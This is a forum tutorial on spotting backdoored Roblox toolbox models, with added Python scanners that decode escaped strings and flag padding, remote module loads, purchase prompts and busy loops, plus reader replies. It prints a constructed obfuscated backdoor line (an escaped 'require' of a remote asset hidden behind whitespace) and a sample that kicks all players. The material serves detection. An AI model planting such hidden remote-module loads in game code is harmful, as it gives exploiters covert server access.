How to identify a malicious model

Introduction

Hello. I’ve been noticing that a lot of models in the toolbox contain viruses that ruin game performance, so I wanted to share with everyone how to identify these models, to make sure that people don’t infect their games with them.

Clarification

The viruses in these models don’t affect your computer in any negative way. What they do is degrade game performance, prompt players to buy something, or give exploiters server-side access to your game.
Models endorsed by ROBLOX (they have a small badge icon on them in the toolbox) do not contain any of these viruses, so you can use them safely.

So how do I identify a malicious model?

Normally, the people who make infected models hide the viruses well by obfuscating the malicious code inside the scripts. The quickest way to identify an infected model is to open its scripts (don’t worry, we won’t need to do any scripting yet) and check whether the scrollbars on the right or at the bottom are bigger than the visible code accounts for: a script whose visible code is only a few lines should not scroll for pages. A good example of this would be:

[screenshot]

The scrollbars are way bigger than they should be because the model makers pad the script with blank lines or long runs of spaces, so the real code sits far beyond what you first see when you open the script. If I scroll the right amount, I find this piece of code:

The first thing to notice is the number between the parentheses: 4696605318. This is a ROBLOX asset ID, and if we look it up we find a script titled MainModule, which means the asset is a ModuleScript. An uploaded module’s functions can be run from a server Script with require(ModuleID), and because require fetches the current version of the module from ROBLOX at run time, whatever the uploader puts in it runs in your game without you (before seeing this post) ever seeing that code in Studio.

You may be asking, “How do you know if he’s running the require() function?”, and my answer would be that using getfenv() is very suspicious, since it’s unnecessary in most scripts: getfenv() returns the script’s environment table, and indexing that table with the string “require” gives you the require function itself without the word ever appearing in plain text (so Ctrl+F won’t find it). I’d then go on to say that \114\101\113\117\105\114\101 is a Lua string written with decimal escape sequences (each \ddd is the character with that code: 114 is r, 101 is e, 113 is q, 117 is u, 105 is i), which spells “require”, so you can pretty much see that the model maker is trying to require his module.

I actually checked his module, and for some reason it just contains a function that’s basically a clone of the print() function… I used this model since it was a good example of what could be malicious.

Another thing: if you see PromptPurchase() being called when you weren’t aware that the script sells anything to the player, delete it. A good example of this was the Kohl’s Admin model that sold a chair model to everyone.
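
As an added example (not part of the original post), here is a small Python checker that applies the indicators above to a script’s source text. It assumes you have the script’s Source as text (copied out of Studio or read from an .rbxlx/.rbxmx export). The three sample scripts are constructed for this example; only the asset ID is the one quoted above. It decodes Lua’s \ddd, \xhh and \u{} escapes before searching, so an escaped “require” is still found, and it flags the padding that makes the scrollbars grow.

```python
import re
from typing import Dict

# Lua string escapes: \ddd (decimal char code, up to three digits), \xhh, \u{hhh}
# and the usual single-character escapes. "\114\101\113\117\105\114\101" is "require".
_ESCAPE = re.compile(r"\\(\d{1,3}|x[0-9A-Fa-f]{2}|u\{[0-9A-Fa-f]+\}|.)", re.DOTALL)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b", "f": "\f",
           "v": "\v", "\\": "\\", '"': '"', "'": "'"}
# Quoted string literals (long [[...]] strings are left alone; they carry no escapes).
_STRING = re.compile(r'"((?:\\.|[^"\\])*)"' r"|'((?:\\.|[^'\\])*)'", re.DOTALL)
# require(id), getfenv()["require"](id) or getfenv().require(id) with a numeric asset ID.
_REQUIRE_ID = re.compile(r'(?:\brequire\b|\[\s*"require"\s*\]|\.require\b)\s*\(\s*(\d+)\s*\)')
_PURCHASE = re.compile(r"\bPrompt(?:Product|GamePass|Premium)?Purchase\b")
# Why the scrollbars grow: code pushed far right by spaces, or far down by blank lines.
_PAD_RIGHT = re.compile(r"^[ \t]{80,}\S", re.MULTILINE)
_PAD_DOWN = re.compile(r"(?:\n[ \t]*){30,}\n")


def decode_lua_escapes(literal: str) -> str:
    """Decode the escape sequences inside the contents of one Lua string literal."""
    def repl(m):
        body = m.group(1)
        if body.isdigit():
            return chr(int(body))
        if body[0] == "x" and len(body) == 3:
            return chr(int(body[1:], 16))
        if body[0] == "u" and len(body) > 1:
            return chr(int(body[2:-1], 16))
        return _SIMPLE.get(body, body)
    return _ESCAPE.sub(repl, literal)


def deobfuscate_strings(src: str) -> str:
    """Rewrite every quoted literal with its escapes decoded, so that
    getfenv()["\\114\\101\\113\\117\\105\\114\\101"] reads as getfenv()["require"]."""
    def repl(m):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        return '"' + decode_lua_escapes(raw) + '"'
    return _STRING.sub(repl, src)


def scan_script(src: str) -> Dict[str, object]:
    """The indicators from the post, evaluated on the de-obfuscated source."""
    clean = deobfuscate_strings(src)
    return {
        "remote_modules": [int(i) for i in _REQUIRE_ID.findall(clean)],
        "getfenv": "getfenv" in clean,
        "purchase_prompts": sorted(set(_PURCHASE.findall(clean))),
        "hidden_by_padding": bool(_PAD_RIGHT.search(src) or _PAD_DOWN.search(src)),
    }


# Constructed sample: a harmless-looking part script padded so the payload sits
# off-screen, with "require" spelled via decimal escapes (asset ID from the post).
INFECTED = (
    "local part = script.Parent\n"
    "part.Touched:Connect(function(hit)\n"
    "    part.BrickColor = BrickColor.Random()\n"
    "end)\n"
    + "\n" * 40
    + " " * 120
    + 'getfenv()["\\114\\101\\113\\117\\105\\114\\101"](4696605318)\n'
)

# Constructed sample: an admin-style script that prompts every joining player to buy
# an asset (CHAIR_ASSET_ID is a placeholder name, not a real ID).
SELLER = (
    'local MarketplaceService = game:GetService("MarketplaceService")\n'
    "game.Players.PlayerAdded:Connect(function(player)\n"
    "    MarketplaceService:PromptPurchase(player, CHAIR_ASSET_ID)\n"
    "end)\n"
)

# Constructed sample: an ordinary door script with nothing to report.
CLEAN = (
    "local door = script.Parent\n"
    "door.Touched:Connect(function() door.CanCollide = false end)\n"
)

if __name__ == "__main__":
    for name, src in (("INFECTED", INFECTED), ("SELLER", SELLER), ("CLEAN", CLEAN)):
        print(name, scan_script(src))
```

A hit on remote_modules means the script loads code from ROBLOX at run time, so inspecting what the module contains today tells you nothing about what it will contain tomorrow; treat the require itself as the finding. The padding thresholds (80 leading spaces, 30 blank lines) are arbitrary choices for this example.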

Rookie Viruses
Rookie viruses include but are not limited to:

  • while true do (or while 1 do) loops with no yielding function, break or return in the body
  • repeat ... until loops whose until condition is always false, and whose body contains no yielding function, break or return
  • A loop that iterates through all players and runs player:Kick() without you being aware of such.

Yielding functions include but are not limited to:

  • wait()
  • coroutine.yield()
  • WaitForChild()
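
Added example, not from the post: a Python checker for the rookie loop patterns above. It does a keyword-balanced scan of a script’s source (not a real Lua parser) and reports a while true or repeat ... until false loop only when its body has no yielding call, no break and no return that would leave the loop. The yield list is the one above plus task.wait() and Signal:Wait(), which are assumed to count; comments and strings are blanked first so that wait() in a comment does not fool it. The sample scripts are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Keywords that open or close Lua blocks, plus the statements that can leave a loop.
_TOKEN = re.compile(r"\b(function|if|while|for|do|repeat|until|end|break|return)\b")
# Yielding calls: the post's list plus task.wait and Signal:Wait() (assumed to count).
_YIELD = re.compile(r"\b(?:task\.)?wait\s*\(|\bcoroutine\.yield\s*\(|\bWaitForChild\s*\(|:Wait\s*\(")
# Comments become a space and strings become "", so their contents are never scanned.
_STR_OR_COMMENT = re.compile(
    r"--\[(=*)\[.*?\]\1\]"        # --[[ long comment ]]
    r"|--[^\n]*"                  # -- line comment
    r"|\[(=*)\[.*?\]\2\]"         # [[ long string ]]
    r'|"(?:\\.|[^"\\\n])*"'       # "string"
    r"|'(?:\\.|[^'\\\n])*'",      # 'string'
    re.DOTALL)
_LOOPS = ("while", "repeat", "for")


@dataclass
class _Frame:
    kind: str             # while | repeat | for | do | if | function
    start: int            # offset where the body begins
    cond: str = ""        # while/for header text
    text: str = ""        # body text at this nesting level only
    yields: bool = False
    exits: bool = False


@dataclass
class BusyLoop:
    kind: str
    cond: str
    body: str


def _never_ends(kind: str, cond: str) -> bool:
    c = " ".join(cond.split())
    return (kind == "while" and c in ("true", "1")) or (kind == "repeat" and c in ("false", "nil"))


def find_busy_loops(src: str) -> List[BusyLoop]:
    """Loops whose condition can never end them and whose body neither yields,
    breaks nor returns. Heuristic: it errs toward reporting."""
    text = _STR_OR_COMMENT.sub(lambda m: " " if m.group(0).startswith("--") else '""', src)
    stack: List[_Frame] = []
    pending = None          # ("while"|"for", header_start) waiting for its `do`
    cursor = 0
    found: List[BusyLoop] = []

    for m in _TOKEN.finditer(text):
        kw, pos, end = m.group(1), m.start(), m.end()
        if stack:                      # text since the last keyword belongs to the innermost block
            stack[-1].text += text[cursor:pos]
        cursor = end
        if kw in ("while", "for"):
            pending = (kw, end)
        elif kw == "do":
            if pending:
                stack.append(_Frame(pending[0], end, cond=text[pending[1]:pos]))
                pending = None
            else:
                stack.append(_Frame("do", end))
        elif kw in ("if", "function", "repeat"):
            stack.append(_Frame(kw, end))
        elif kw == "break":            # leaves the innermost loop only
            for f in reversed(stack):
                if f.kind == "function":
                    break
                if f.kind in _LOOPS:
                    f.exits = True
                    break
        elif kw == "return":           # leaves every loop up to the enclosing function
            for f in reversed(stack):
                if f.kind == "function":
                    break
                if f.kind in _LOOPS:
                    f.exits = True
        elif stack:                    # "end" or "until" closes the innermost block
            f = stack.pop()
            f.yields = f.yields or bool(_YIELD.search(f.text))
            if f.kind in _LOOPS:
                cond = f.cond if kw == "end" else text[end:].split("\n", 1)[0]
                if _never_ends(f.kind, cond) and not f.yields and not f.exits:
                    found.append(BusyLoop(f.kind, " ".join(cond.split()), text[f.start:pos].strip()))
            if stack:
                parent = stack[-1]
                if f.kind != "function":   # a yield inside a nested function runs later, not here
                    parent.yields = parent.yields or f.yields
                if f.kind in ("if", "do"):  # a break/return inside an if still leaves the loop
                    parent.exits = parent.exits or f.exits
    return found


# Constructed samples in the shape of the rookie patterns above.
BUSY = "while true do\n    script.Parent.Transparency = 0.5\nend\n"
KICK_ALL = ("repeat\n    for _, player in pairs(game.Players:GetPlayers()) do\n"
            "        player:Kick()\n    end\nuntil false\n")
POLITE = "while true do\n    script.Parent.Transparency = 0.5\n    wait(1)\nend\n"
HARMLESS = "while true do break end\n"

if __name__ == "__main__":
    for name in ("BUSY", "KICK_ALL", "POLITE", "HARMLESS"):
        print(name, find_busy_loops(globals()[name]))
```

A yield that only sits inside a nested function (for example a spawn(function() wait() end) call) is deliberately not credited to the enclosing loop, since that function runs on its own thread while the loop itself keeps spinning.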

Hope I helped! And if I forgot something or made an error in my post, please tell me!

37 Likes

Just because the condition is always true and it never calls wait doesn’t mean that the loop never terminates or yields (wait isn’t the only function that yields).
Consider:

while true do break end            -- condition never fails, but break leaves on the first pass
repeat break until false           -- same for repeat/until
for i=1,math.huge do break end     -- an unbounded for loop, also left by break

local thread = coroutine.wrap(function(i)
    while true do
        i = i + coroutine.yield(i) -- yields every iteration without ever calling wait
    end
end)
print(thread(1)) --> 1
print(thread(2)) --> 3
print(thread(3)) --> 6
3 Likes

Ah, forgot about that. Let me edit my post.

1 Like

You could also just delete the scripts from the models you put into your game.

Sometimes the scripts actually serve a purpose, though.

3 Likes

Nice tutorial, but the sickening part out of all of this is the number of backdoored models that have remained (botted) on the front page for months.

Even completely infamous accounts like TopQualityModels are still not terminated despite having been botting backdoors on the same account for months.

3 Likes

In reality, infinite loops do get terminated. If they don’t yield for a few seconds, then the game engine stops the script.

However, this doesn’t discount the fact that scripts can still lag servers to the point of being unplayable.

[screenshot]

1 Like

Thank you for this. Now I don’t have to worry about my game being hacked or infected.

3 Likes